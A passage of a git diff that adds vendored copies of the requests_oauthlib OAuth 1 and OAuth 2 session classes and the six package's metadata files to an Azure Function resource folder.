'https://api.twitter.com/oauth/authorize?oauth_token=sdf0o9823sjdfsdf&oauth_callback=https%3A%2F%2F127.0.0.1%2Fcallback' + >>> + >>> # Third step. Fetch the access token + >>> redirect_response = raw_input('Paste the full redirect URL here.') + >>> oauth_session.parse_authorization_response(redirect_response) + { + 'oauth_token: 'kjerht2309u', + 'oauth_token_secret: 'lsdajfh923874', + 'oauth_verifier: 'w34o8967345', + } + >>> oauth_session.fetch_access_token(access_token_url) + { + 'oauth_token': 'sdf0o9823sjdfsdf', + 'oauth_token_secret': '2kjshdfp92i34asdasd', + } + >>> # Done. You can now make OAuth requests. + >>> status_url = 'http://api.twitter.com/1/statuses/update.json' + >>> new_status = {'status': 'hello world!'} + >>> oauth_session.post(status_url, data=new_status) + + """ + + def __init__( + self, + client_key, + client_secret=None, + resource_owner_key=None, + resource_owner_secret=None, + callback_uri=None, + signature_method=SIGNATURE_HMAC, + signature_type=SIGNATURE_TYPE_AUTH_HEADER, + rsa_key=None, + verifier=None, + client_class=None, + force_include_body=False, + **kwargs + ): + """Construct the OAuth 1 session. + + :param client_key: A client specific identifier. + :param client_secret: A client specific secret used to create HMAC and + plaintext signatures. + :param resource_owner_key: A resource owner key, also referred to as + request token or access token depending on + when in the workflow it is used. + :param resource_owner_secret: A resource owner secret obtained with + either a request or access token. Often + referred to as token secret. + :param callback_uri: The URL the user is redirect back to after + authorization. + :param signature_method: Signature methods determine how the OAuth + signature is created. The three options are + oauthlib.oauth1.SIGNATURE_HMAC (default), + oauthlib.oauth1.SIGNATURE_RSA and + oauthlib.oauth1.SIGNATURE_PLAIN. + :param signature_type: Signature type decides where the OAuth + parameters are added. Either in the + Authorization header (default) or to the URL + query parameters or the request body. Defined as + oauthlib.oauth1.SIGNATURE_TYPE_AUTH_HEADER, + oauthlib.oauth1.SIGNATURE_TYPE_QUERY and + oauthlib.oauth1.SIGNATURE_TYPE_BODY + respectively. + :param rsa_key: The private RSA key as a string. Can only be used with + signature_method=oauthlib.oauth1.SIGNATURE_RSA. + :param verifier: A verifier string to prove authorization was granted. + :param client_class: A subclass of `oauthlib.oauth1.Client` to use with + `requests_oauthlib.OAuth1` instead of the default + :param force_include_body: Always include the request body in the + signature creation. + :param **kwargs: Additional keyword arguments passed to `OAuth1` + """ + super(OAuth1Session, self).__init__() + self._client = OAuth1( + client_key, + client_secret=client_secret, + resource_owner_key=resource_owner_key, + resource_owner_secret=resource_owner_secret, + callback_uri=callback_uri, + signature_method=signature_method, + signature_type=signature_type, + rsa_key=rsa_key, + verifier=verifier, + client_class=client_class, + force_include_body=force_include_body, + **kwargs + ) + self.auth = self._client + + @property + def token(self): + oauth_token = self._client.client.resource_owner_key + oauth_token_secret = self._client.client.resource_owner_secret + oauth_verifier = self._client.client.verifier + + token_dict = {} + if oauth_token: + token_dict["oauth_token"] = oauth_token + if oauth_token_secret: + token_dict["oauth_token_secret"] = oauth_token_secret + if oauth_verifier: + token_dict["oauth_verifier"] = oauth_verifier + + return token_dict + + @token.setter + def token(self, value): + self._populate_attributes(value) + + @property + def authorized(self): + """Boolean that indicates whether this session has an OAuth token + or not. If `self.authorized` is True, you can reasonably expect + OAuth-protected requests to the resource to succeed. If + `self.authorized` is False, you need the user to go through the OAuth + authentication dance before OAuth-protected requests to the resource + will succeed. + """ + if self._client.client.signature_method == SIGNATURE_RSA: + # RSA only uses resource_owner_key + return bool(self._client.client.resource_owner_key) + else: + # other methods of authentication use all three pieces + return ( + bool(self._client.client.client_secret) + and bool(self._client.client.resource_owner_key) + and bool(self._client.client.resource_owner_secret) + ) + + def authorization_url(self, url, request_token=None, **kwargs): + """Create an authorization URL by appending request_token and optional + kwargs to url. + + This is the second step in the OAuth 1 workflow. The user should be + redirected to this authorization URL, grant access to you, and then + be redirected back to you. The redirection back can either be specified + during client registration or by supplying a callback URI per request. + + :param url: The authorization endpoint URL. + :param request_token: The previously obtained request token. + :param kwargs: Optional parameters to append to the URL. + :returns: The authorization URL with new parameters embedded. + + An example using a registered default callback URI. + + >>> request_token_url = 'https://api.twitter.com/oauth/request_token' + >>> authorization_url = 'https://api.twitter.com/oauth/authorize' + >>> oauth_session = OAuth1Session('client-key', client_secret='secret') + >>> oauth_session.fetch_request_token(request_token_url) + { + 'oauth_token': 'sdf0o9823sjdfsdf', + 'oauth_token_secret': '2kjshdfp92i34asdasd', + } + >>> oauth_session.authorization_url(authorization_url) + 'https://api.twitter.com/oauth/authorize?oauth_token=sdf0o9823sjdfsdf' + >>> oauth_session.authorization_url(authorization_url, foo='bar') + 'https://api.twitter.com/oauth/authorize?oauth_token=sdf0o9823sjdfsdf&foo=bar' + + An example using an explicit callback URI. + + >>> request_token_url = 'https://api.twitter.com/oauth/request_token' + >>> authorization_url = 'https://api.twitter.com/oauth/authorize' + >>> oauth_session = OAuth1Session('client-key', client_secret='secret', callback_uri='https://127.0.0.1/callback') + >>> oauth_session.fetch_request_token(request_token_url) + { + 'oauth_token': 'sdf0o9823sjdfsdf', + 'oauth_token_secret': '2kjshdfp92i34asdasd', + } + >>> oauth_session.authorization_url(authorization_url) + 'https://api.twitter.com/oauth/authorize?oauth_token=sdf0o9823sjdfsdf&oauth_callback=https%3A%2F%2F127.0.0.1%2Fcallback' + """ + kwargs["oauth_token"] = request_token or self._client.client.resource_owner_key + log.debug("Adding parameters %s to url %s", kwargs, url) + return add_params_to_uri(url, kwargs.items()) + + def fetch_request_token(self, url, realm=None, **request_kwargs): + r"""Fetch a request token. + + This is the first step in the OAuth 1 workflow. A request token is + obtained by making a signed post request to url. The token is then + parsed from the application/x-www-form-urlencoded response and ready + to be used to construct an authorization url. + + :param url: The request token endpoint URL. + :param realm: A list of realms to request access to. + :param \*\*request_kwargs: Optional arguments passed to ''post'' + function in ''requests.Session'' + :returns: The response in dict format. + + Note that a previously set callback_uri will be reset for your + convenience, or else signature creation will be incorrect on + consecutive requests. + + >>> request_token_url = 'https://api.twitter.com/oauth/request_token' + >>> oauth_session = OAuth1Session('client-key', client_secret='secret') + >>> oauth_session.fetch_request_token(request_token_url) + { + 'oauth_token': 'sdf0o9823sjdfsdf', + 'oauth_token_secret': '2kjshdfp92i34asdasd', + } + """ + self._client.client.realm = " ".join(realm) if realm else None + token = self._fetch_token(url, **request_kwargs) + log.debug("Resetting callback_uri and realm (not needed in next phase).") + self._client.client.callback_uri = None + self._client.client.realm = None + return token + + def fetch_access_token(self, url, verifier=None, **request_kwargs): + """Fetch an access token. + + This is the final step in the OAuth 1 workflow. An access token is + obtained using all previously obtained credentials, including the + verifier from the authorization step. + + Note that a previously set verifier will be reset for your + convenience, or else signature creation will be incorrect on + consecutive requests. + + >>> access_token_url = 'https://api.twitter.com/oauth/access_token' + >>> redirect_response = 'https://127.0.0.1/callback?oauth_token=kjerht2309uf&oauth_token_secret=lsdajfh923874&oauth_verifier=w34o8967345' + >>> oauth_session = OAuth1Session('client-key', client_secret='secret') + >>> oauth_session.parse_authorization_response(redirect_response) + { + 'oauth_token: 'kjerht2309u', + 'oauth_token_secret: 'lsdajfh923874', + 'oauth_verifier: 'w34o8967345', + } + >>> oauth_session.fetch_access_token(access_token_url) + { + 'oauth_token': 'sdf0o9823sjdfsdf', + 'oauth_token_secret': '2kjshdfp92i34asdasd', + } + """ + if verifier: + self._client.client.verifier = verifier + if not getattr(self._client.client, "verifier", None): + raise VerifierMissing("No client verifier has been set.") + token = self._fetch_token(url, **request_kwargs) + log.debug("Resetting verifier attribute, should not be used anymore.") + self._client.client.verifier = None + return token + + def parse_authorization_response(self, url): + """Extract parameters from the post authorization redirect response URL. + + :param url: The full URL that resulted from the user being redirected + back from the OAuth provider to you, the client. + :returns: A dict of parameters extracted from the URL. + + >>> redirect_response = 'https://127.0.0.1/callback?oauth_token=kjerht2309uf&oauth_token_secret=lsdajfh923874&oauth_verifier=w34o8967345' + >>> oauth_session = OAuth1Session('client-key', client_secret='secret') + >>> oauth_session.parse_authorization_response(redirect_response) + { + 'oauth_token: 'kjerht2309u', + 'oauth_token_secret: 'lsdajfh923874', + 'oauth_verifier: 'w34o8967345', + } + """ + log.debug("Parsing token from query part of url %s", url) + token = dict(urldecode(urlparse(url).query)) + log.debug("Updating internal client token attribute.") + self._populate_attributes(token) + self.token = token + return token + + def _populate_attributes(self, token): + if "oauth_token" in token: + self._client.client.resource_owner_key = token["oauth_token"] + else: + raise TokenMissing( + "Response does not contain a token: {resp}".format(resp=token), token + ) + if "oauth_token_secret" in token: + self._client.client.resource_owner_secret = token["oauth_token_secret"] + if "oauth_verifier" in token: + self._client.client.verifier = token["oauth_verifier"] + + def _fetch_token(self, url, **request_kwargs): + log.debug("Fetching token from %s using client %s", url, self._client.client) + r = self.post(url, **request_kwargs) + + if r.status_code >= 400: + error = "Token request failed with code %s, response was '%s'." + raise TokenRequestDenied(error % (r.status_code, r.text), r) + + log.debug('Decoding token from response "%s"', r.text) + try: + token = dict(urldecode(r.text.strip())) + except ValueError as e: + error = ( + "Unable to decode token from token response. " + "This is commonly caused by an unsuccessful request where" + " a non urlencoded error message is returned. " + "The decoding error was %s" + "" % e + ) + raise ValueError(error) + + log.debug("Obtained token %s", token) + log.debug("Updating internal client attributes from token data.") + self._populate_attributes(token) + self.token = token + return token + + def rebuild_auth(self, prepared_request, response): + """ + When being redirected we should always strip Authorization + header, since nonce may not be reused as per OAuth spec. + """ + if "Authorization" in prepared_request.headers: + # If we get redirected to a new host, we should strip out + # any authentication headers. + prepared_request.headers.pop("Authorization", True) + prepared_request.prepare_auth(self.auth) + return diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_auth.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_auth.py new file mode 100644 index 0000000..04c71e7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_auth.py @@ -0,0 +1,37 @@ +from __future__ import unicode_literals +from oauthlib.oauth2 import WebApplicationClient, InsecureTransportError +from oauthlib.oauth2 import is_secure_transport +from requests.auth import AuthBase + + +class OAuth2(AuthBase): + """Adds proof of authorization (OAuth2 token) to the request.""" + + def __init__(self, client_id=None, client=None, token=None): + """Construct a new OAuth 2 authorization object. + + :param client_id: Client id obtained during registration + :param client: :class:`oauthlib.oauth2.Client` to be used. Default is + WebApplicationClient which is useful for any + hosted application but not mobile or desktop. + :param token: Token dictionary, must include access_token + and token_type. + """ + self._client = client or WebApplicationClient(client_id, token=token) + if token: + for k, v in token.items(): + setattr(self._client, k, v) + + def __call__(self, r): + """Append an OAuth 2 token to the request. + + Note that currently HTTPS is required for all requests. There may be + a token type that allows for plain HTTP in the future and then this + should be updated to allow plain HTTP on a white list basis. + """ + if not is_secure_transport(r.url): + raise InsecureTransportError() + r.url, r.headers, r.body = self._client.add_token( + r.url, http_method=r.method, body=r.body, headers=r.headers + ) + return r diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_session.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_session.py new file mode 100644 index 0000000..5bd352e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth2_session.py @@ -0,0 +1,540 @@ +from __future__ import unicode_literals + +import logging + +from oauthlib.common import generate_token, urldecode +from oauthlib.oauth2 import WebApplicationClient, InsecureTransportError +from oauthlib.oauth2 import LegacyApplicationClient +from oauthlib.oauth2 import TokenExpiredError, is_secure_transport +import requests + +log = logging.getLogger(__name__) + + +class TokenUpdated(Warning): + def __init__(self, token): + super(TokenUpdated, self).__init__() + self.token = token + + +class OAuth2Session(requests.Session): + """Versatile OAuth 2 extension to :class:`requests.Session`. + + Supports any grant type adhering to :class:`oauthlib.oauth2.Client` spec + including the four core OAuth 2 grants. + + Can be used to create authorization urls, fetch tokens and access protected + resources using the :class:`requests.Session` interface you are used to. + + - :class:`oauthlib.oauth2.WebApplicationClient` (default): Authorization Code Grant + - :class:`oauthlib.oauth2.MobileApplicationClient`: Implicit Grant + - :class:`oauthlib.oauth2.LegacyApplicationClient`: Password Credentials Grant + - :class:`oauthlib.oauth2.BackendApplicationClient`: Client Credentials Grant + + Note that the only time you will be using Implicit Grant from python is if + you are driving a user agent able to obtain URL fragments. + """ + + def __init__( + self, + client_id=None, + client=None, + auto_refresh_url=None, + auto_refresh_kwargs=None, + scope=None, + redirect_uri=None, + token=None, + state=None, + token_updater=None, + **kwargs + ): + """Construct a new OAuth 2 client session. + + :param client_id: Client id obtained during registration + :param client: :class:`oauthlib.oauth2.Client` to be used. Default is + WebApplicationClient which is useful for any + hosted application but not mobile or desktop. + :param scope: List of scopes you wish to request access to + :param redirect_uri: Redirect URI you registered as callback + :param token: Token dictionary, must include access_token + and token_type. + :param state: State string used to prevent CSRF. This will be given + when creating the authorization url and must be supplied + when parsing the authorization response. + Can be either a string or a no argument callable. + :auto_refresh_url: Refresh token endpoint URL, must be HTTPS. Supply + this if you wish the client to automatically refresh + your access tokens. + :auto_refresh_kwargs: Extra arguments to pass to the refresh token + endpoint. + :token_updater: Method with one argument, token, to be used to update + your token database on automatic token refresh. If not + set a TokenUpdated warning will be raised when a token + has been refreshed. This warning will carry the token + in its token argument. + :param kwargs: Arguments to pass to the Session constructor. + """ + super(OAuth2Session, self).__init__(**kwargs) + self._client = client or WebApplicationClient(client_id, token=token) + self.token = token or {} + self.scope = scope + self.redirect_uri = redirect_uri + self.state = state or generate_token + self._state = state + self.auto_refresh_url = auto_refresh_url + self.auto_refresh_kwargs = auto_refresh_kwargs or {} + self.token_updater = token_updater + + # Ensure that requests doesn't do any automatic auth. See #278. + # The default behavior can be re-enabled by setting auth to None. + self.auth = lambda r: r + + # Allow customizations for non compliant providers through various + # hooks to adjust requests and responses. + self.compliance_hook = { + "access_token_response": set(), + "refresh_token_response": set(), + "protected_request": set(), + } + + def new_state(self): + """Generates a state string to be used in authorizations.""" + try: + self._state = self.state() + log.debug("Generated new state %s.", self._state) + except TypeError: + self._state = self.state + log.debug("Re-using previously supplied state %s.", self._state) + return self._state + + @property + def client_id(self): + return getattr(self._client, "client_id", None) + + @client_id.setter + def client_id(self, value): + self._client.client_id = value + + @client_id.deleter + def client_id(self): + del self._client.client_id + + @property + def token(self): + return getattr(self._client, "token", None) + + @token.setter + def token(self, value): + self._client.token = value + self._client.populate_token_attributes(value) + + @property + def access_token(self): + return getattr(self._client, "access_token", None) + + @access_token.setter + def access_token(self, value): + self._client.access_token = value + + @access_token.deleter + def access_token(self): + del self._client.access_token + + @property + def authorized(self): + """Boolean that indicates whether this session has an OAuth token + or not. If `self.authorized` is True, you can reasonably expect + OAuth-protected requests to the resource to succeed. If + `self.authorized` is False, you need the user to go through the OAuth + authentication dance before OAuth-protected requests to the resource + will succeed. + """ + return bool(self.access_token) + + def authorization_url(self, url, state=None, **kwargs): + """Form an authorization URL. + + :param url: Authorization endpoint url, must be HTTPS. + :param state: An optional state string for CSRF protection. If not + given it will be generated for you. + :param kwargs: Extra parameters to include. + :return: authorization_url, state + """ + state = state or self.new_state() + return ( + self._client.prepare_request_uri( + url, + redirect_uri=self.redirect_uri, + scope=self.scope, + state=state, + **kwargs + ), + state, + ) + + def fetch_token( + self, + token_url, + code=None, + authorization_response=None, + body="", + auth=None, + username=None, + password=None, + method="POST", + force_querystring=False, + timeout=None, + headers=None, + verify=True, + proxies=None, + include_client_id=None, + client_secret=None, + cert=None, + **kwargs + ): + """Generic method for fetching an access token from the token endpoint. + + If you are using the MobileApplicationClient you will want to use + `token_from_fragment` instead of `fetch_token`. + + The current implementation enforces the RFC guidelines. + + :param token_url: Token endpoint URL, must use HTTPS. + :param code: Authorization code (used by WebApplicationClients). + :param authorization_response: Authorization response URL, the callback + URL of the request back to you. Used by + WebApplicationClients instead of code. + :param body: Optional application/x-www-form-urlencoded body to add the + include in the token request. Prefer kwargs over body. + :param auth: An auth tuple or method as accepted by `requests`. + :param username: Username required by LegacyApplicationClients to appear + in the request body. + :param password: Password required by LegacyApplicationClients to appear + in the request body. + :param method: The HTTP method used to make the request. Defaults + to POST, but may also be GET. Other methods should + be added as needed. + :param force_querystring: If True, force the request body to be sent + in the querystring instead. + :param timeout: Timeout of the request in seconds. + :param headers: Dict to default request headers with. + :param verify: Verify SSL certificate. + :param proxies: The `proxies` argument is passed onto `requests`. + :param include_client_id: Should the request body include the + `client_id` parameter. Default is `None`, + which will attempt to autodetect. This can be + forced to always include (True) or never + include (False). + :param client_secret: The `client_secret` paired to the `client_id`. + This is generally required unless provided in the + `auth` tuple. If the value is `None`, it will be + omitted from the request, however if the value is + an empty string, an empty string will be sent. + :param cert: Client certificate to send for OAuth 2.0 Mutual-TLS Client + Authentication (draft-ietf-oauth-mtls). Can either be the + path of a file containing the private key and certificate or + a tuple of two filenames for certificate and key. + :param kwargs: Extra parameters to include in the token request. + :return: A token dict + """ + if not is_secure_transport(token_url): + raise InsecureTransportError() + + if not code and authorization_response: + self._client.parse_request_uri_response( + authorization_response, state=self._state + ) + code = self._client.code + elif not code and isinstance(self._client, WebApplicationClient): + code = self._client.code + if not code: + raise ValueError( + "Please supply either code or " "authorization_response parameters." + ) + + # Earlier versions of this library build an HTTPBasicAuth header out of + # `username` and `password`. The RFC states, however these attributes + # must be in the request body and not the header. + # If an upstream server is not spec compliant and requires them to + # appear as an Authorization header, supply an explicit `auth` header + # to this function. + # This check will allow for empty strings, but not `None`. + # + # References + # 4.3.2 - Resource Owner Password Credentials Grant + # https://tools.ietf.org/html/rfc6749#section-4.3.2 + + if isinstance(self._client, LegacyApplicationClient): + if username is None: + raise ValueError( + "`LegacyApplicationClient` requires both the " + "`username` and `password` parameters." + ) + if password is None: + raise ValueError( + "The required parameter `username` was supplied, " + "but `password` was not." + ) + + # merge username and password into kwargs for `prepare_request_body` + if username is not None: + kwargs["username"] = username + if password is not None: + kwargs["password"] = password + + # is an auth explicitly supplied? + if auth is not None: + # if we're dealing with the default of `include_client_id` (None): + # we will assume the `auth` argument is for an RFC compliant server + # and we should not send the `client_id` in the body. + # This approach allows us to still force the client_id by submitting + # `include_client_id=True` along with an `auth` object. + if include_client_id is None: + include_client_id = False + + # otherwise we may need to create an auth header + else: + # since we don't have an auth header, we MAY need to create one + # it is possible that we want to send the `client_id` in the body + # if so, `include_client_id` should be set to True + # otherwise, we will generate an auth header + if include_client_id is not True: + client_id = self.client_id + if client_id: + log.debug( + 'Encoding `client_id` "%s" with `client_secret` ' + "as Basic auth credentials.", + client_id, + ) + client_secret = client_secret if client_secret is not None else "" + auth = requests.auth.HTTPBasicAuth(client_id, client_secret) + + if include_client_id: + # this was pulled out of the params + # it needs to be passed into prepare_request_body + if client_secret is not None: + kwargs["client_secret"] = client_secret + + body = self._client.prepare_request_body( + code=code, + body=body, + redirect_uri=self.redirect_uri, + include_client_id=include_client_id, + **kwargs + ) + + headers = headers or { + "Accept": "application/json", + "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", + } + self.token = {} + request_kwargs = {} + if method.upper() == "POST": + request_kwargs["params" if force_querystring else "data"] = dict( + urldecode(body) + ) + elif method.upper() == "GET": + request_kwargs["params"] = dict(urldecode(body)) + else: + raise ValueError("The method kwarg must be POST or GET.") + + r = self.request( + method=method, + url=token_url, + timeout=timeout, + headers=headers, + auth=auth, + verify=verify, + proxies=proxies, + cert=cert, + **request_kwargs + ) + + log.debug("Request to fetch token completed with status %s.", r.status_code) + log.debug("Request url was %s", r.request.url) + log.debug("Request headers were %s", r.request.headers) + log.debug("Request body was %s", r.request.body) + log.debug("Response headers were %s and content %s.", r.headers, r.text) + log.debug( + "Invoking %d token response hooks.", + len(self.compliance_hook["access_token_response"]), + ) + for hook in self.compliance_hook["access_token_response"]: + log.debug("Invoking hook %s.", hook) + r = hook(r) + + self._client.parse_request_body_response(r.text, scope=self.scope) + self.token = self._client.token + log.debug("Obtained token %s.", self.token) + return self.token + + def token_from_fragment(self, authorization_response): + """Parse token from the URI fragment, used by MobileApplicationClients. + + :param authorization_response: The full URL of the redirect back to you + :return: A token dict + """ + self._client.parse_request_uri_response( + authorization_response, state=self._state + ) + self.token = self._client.token + return self.token + + def refresh_token( + self, + token_url, + refresh_token=None, + body="", + auth=None, + timeout=None, + headers=None, + verify=True, + proxies=None, + **kwargs + ): + """Fetch a new access token using a refresh token. + + :param token_url: The token endpoint, must be HTTPS. + :param refresh_token: The refresh_token to use. + :param body: Optional application/x-www-form-urlencoded body to add the + include in the token request. Prefer kwargs over body. + :param auth: An auth tuple or method as accepted by `requests`. + :param timeout: Timeout of the request in seconds. + :param headers: A dict of headers to be used by `requests`. + :param verify: Verify SSL certificate. + :param proxies: The `proxies` argument will be passed to `requests`. + :param kwargs: Extra parameters to include in the token request. + :return: A token dict + """ + if not token_url: + raise ValueError("No token endpoint set for auto_refresh.") + + if not is_secure_transport(token_url): + raise InsecureTransportError() + + refresh_token = refresh_token or self.token.get("refresh_token") + + log.debug( + "Adding auto refresh key word arguments %s.", self.auto_refresh_kwargs + ) + kwargs.update(self.auto_refresh_kwargs) + body = self._client.prepare_refresh_body( + body=body, refresh_token=refresh_token, scope=self.scope, **kwargs + ) + log.debug("Prepared refresh token request body %s", body) + + if headers is None: + headers = { + "Accept": "application/json", + "Content-Type": ("application/x-www-form-urlencoded;charset=UTF-8"), + } + + r = self.post( + token_url, + data=dict(urldecode(body)), + auth=auth, + timeout=timeout, + headers=headers, + verify=verify, + withhold_token=True, + proxies=proxies, + ) + log.debug("Request to refresh token completed with status %s.", r.status_code) + log.debug("Response headers were %s and content %s.", r.headers, r.text) + log.debug( + "Invoking %d token response hooks.", + len(self.compliance_hook["refresh_token_response"]), + ) + for hook in self.compliance_hook["refresh_token_response"]: + log.debug("Invoking hook %s.", hook) + r = hook(r) + + self.token = self._client.parse_request_body_response(r.text, scope=self.scope) + if not "refresh_token" in self.token: + log.debug("No new refresh token given. Re-using old.") + self.token["refresh_token"] = refresh_token + return self.token + + def request( + self, + method, + url, + data=None, + headers=None, + withhold_token=False, + client_id=None, + client_secret=None, + **kwargs + ): + """Intercept all requests and add the OAuth 2 token if present.""" + if not is_secure_transport(url): + raise InsecureTransportError() + if self.token and not withhold_token: + log.debug( + "Invoking %d protected resource request hooks.", + len(self.compliance_hook["protected_request"]), + ) + for hook in self.compliance_hook["protected_request"]: + log.debug("Invoking hook %s.", hook) + url, headers, data = hook(url, headers, data) + + log.debug("Adding token %s to request.", self.token) + try: + url, headers, data = self._client.add_token( + url, http_method=method, body=data, headers=headers + ) + # Attempt to retrieve and save new access token if expired + except TokenExpiredError: + if self.auto_refresh_url: + log.debug( + "Auto refresh is set, attempting to refresh at %s.", + self.auto_refresh_url, + ) + + # We mustn't pass auth twice. + auth = kwargs.pop("auth", None) + if client_id and client_secret and (auth is None): + log.debug( + 'Encoding client_id "%s" with client_secret as Basic auth credentials.', + client_id, + ) + auth = requests.auth.HTTPBasicAuth(client_id, client_secret) + token = self.refresh_token( + self.auto_refresh_url, auth=auth, **kwargs + ) + if self.token_updater: + log.debug( + "Updating token to %s using %s.", token, self.token_updater + ) + self.token_updater(token) + url, headers, data = self._client.add_token( + url, http_method=method, body=data, headers=headers + ) + else: + raise TokenUpdated(token) + else: + raise + + log.debug("Requesting url %s using method %s.", url, method) + log.debug("Supplying headers %s and data %s", headers, data) + log.debug("Passing through key word arguments %s.", kwargs) + return super(OAuth2Session, self).request( + method, url, headers=headers, data=data, **kwargs + ) + + def register_compliance_hook(self, hook_type, hook): + """Register a hook for request/response tweaking. + + Available hooks are: + access_token_response invoked before token parsing. + refresh_token_response invoked before refresh token parsing. + protected_request invoked before making a request. + + If you find a new hook is needed please send a GitHub PR request + or open an issue. + """ + if hook_type not in self.compliance_hook: + raise ValueError( + "Hook type %s is not in %s.", hook_type, self.compliance_hook + ) + self.compliance_hook[hook_type].add(hook) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/LICENSE new file mode 100644 index 0000000..091cadd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/LICENSE @@ -0,0 +1,18 @@ +Copyright (c) 2010-2020 Benjamin Peterson + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of +the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS +FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR +COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER +IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN +CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/METADATA new file mode 100644 index 0000000..12828c8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/METADATA @@ -0,0 +1,49 @@ +Metadata-Version: 2.1 +Name: six +Version: 1.16.0 +Summary: Python 2 and 3 compatibility utilities +Home-page: https://github.com/benjaminp/six +Author: Benjamin Peterson +Author-email: benjamin@python.org +License: MIT +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 3 +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Topic :: Software Development :: Libraries +Classifier: Topic :: Utilities +Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.* + +.. image:: https://img.shields.io/pypi/v/six.svg + :target: https://pypi.org/project/six/ + :alt: six on PyPI + +.. image:: https://travis-ci.org/benjaminp/six.svg?branch=master + :target: https://travis-ci.org/benjaminp/six + :alt: six on TravisCI + +.. image:: https://readthedocs.org/projects/six/badge/?version=latest + :target: https://six.readthedocs.io/ + :alt: six's documentation on Read the Docs + +.. image:: https://img.shields.io/badge/license-MIT-green.svg + :target: https://github.com/benjaminp/six/blob/master/LICENSE + :alt: MIT License badge + +Six is a Python 2 and 3 compatibility library. It provides utility functions +for smoothing over the differences between the Python versions with the goal of +writing Python code that is compatible on both Python versions. See the +documentation for more information on what is provided. + +Six supports Python 2.7 and 3.3+. It is contained in only one Python +file, so it can be easily copied into your project. (The copyright and license +notice must be retained.) + +Online documentation is at https://six.readthedocs.io/. + +Bugs can be reported to https://github.com/benjaminp/six. The code can also +be found there. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/RECORD new file mode 100644 index 0000000..d8c0f6c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/RECORD @@ -0,0 +1,8 @@ +__pycache__/six.cpython-39.pyc,, +six-1.16.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +six-1.16.0.dist-info/LICENSE,sha256=i7hQxWWqOJ_cFvOkaWWtI9gq3_YPI5P8J2K2MYXo5sk,1066 +six-1.16.0.dist-info/METADATA,sha256=VQcGIFCAEmfZcl77E5riPCN4v2TIsc_qtacnjxKHJoI,1795 +six-1.16.0.dist-info/RECORD,, +six-1.16.0.dist-info/WHEEL,sha256=Z-nyYpwrcSqxfdux5Mbn_DQ525iP7J2DG3JgGvOYyTQ,110 +six-1.16.0.dist-info/top_level.txt,sha256=_iVH_iYEtEXnD8nYGQYpYFUvkUW9sEO1GYbkeKSAais,4 +six.py,sha256=TOOfQi7nFGfMrIvtdr6wX4wyHH8M7aknmuLfo2cBBrM,34549 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/WHEEL new file mode 100644 index 0000000..e283ba9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.36.2) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/six-1.16.0.dist-info/top_level.txt new file mode 100644 index 0000000..1021105 --- /dev/null +++ 